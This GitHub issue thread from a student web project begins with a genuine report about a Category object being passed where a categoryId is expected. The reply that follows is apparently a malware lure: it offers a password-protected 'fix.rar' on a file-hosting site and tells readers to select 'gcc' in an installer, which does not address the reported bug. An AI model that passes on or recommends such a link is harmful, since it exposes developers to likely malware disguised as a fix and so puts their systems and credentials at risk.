### ISSUE TITLE
Data type mismatch

### ISSUE THREAD

**Issue by sojanonelson** [tijothomas2000/fosoftfinaltask#1]
error at Line 15 [`backend/controllers/post.controller.js`](https://github.com/tijothomas2000/fosoftfinaltask/blob/main/backend/controllers/post.controller.js)

If you passed a full Category object instead of just the `categoryId` in your request, this could lead to issues, as your addProduct function expects a categoryId, not a whole object.

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
